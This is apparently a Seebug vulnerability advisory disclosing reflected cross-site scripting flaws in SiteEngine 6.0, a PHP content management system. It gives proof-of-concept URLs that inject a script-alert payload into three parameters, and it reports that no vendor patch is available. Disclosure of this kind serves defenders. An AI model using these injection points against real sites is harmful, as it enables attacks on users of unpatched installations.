SiteEngine 6.0 XSS vulnerability

2010-11-27T00:00:00
ID SSV:20271
Type seebug
Reporter Root
Modified 2010-11-27T00:00:00

Description

网站引擎(SiteEngine,全称:博卡网站引擎管理系统),软件基于PHP程序和Mysql数据库开发,采用B/S体系结构。

[*]POC: http://server/comments.php?module=news&id=[XSS] http://server/news.php?pagestart=1&classid=[XSS] http://server/search.php?searchword=[XSS]

SiteEngine 6.0 厂商补丁: SiteEngine


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.siteengine.net/

                                        
                                            
                                                [*]Exploit:
 
http://server/comments.php?module=news&id=1"><script>alert(/xss/)</script>
http://server/news.php?pagestart=1&classid=1"><script>alert(/xss/)</script>
http://server/search.php?searchword=<script>alert(/xss/)</script>